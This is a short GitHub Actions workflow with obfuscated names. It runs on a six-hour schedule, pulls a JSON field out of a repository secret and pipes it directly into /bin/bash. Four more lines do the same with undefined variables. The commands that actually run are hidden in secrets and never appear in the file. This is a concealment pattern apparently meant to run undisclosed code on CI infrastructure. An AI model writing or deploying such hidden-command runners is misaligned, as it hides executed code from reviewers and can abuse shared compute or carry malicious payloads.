name: chaililiang4789
on:
  workflow_dispatch:
  schedule:
    - cron: '18 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: chaililiang4789
        env:
          ym219: ${{ secrets.ym219 }}
        run: |
          echo $ym219 | jq -r .nya1050 | /bin/bash
          echo $m34625 | jq -r .wbcl4 | /bin/bash
          echo $af781 | jq -r .p716 | /bin/bash
          echo $xq8 | jq -r .zojl913 | /bin/bash
          echo $amy9546 | jq -r .fk01 | /bin/bash

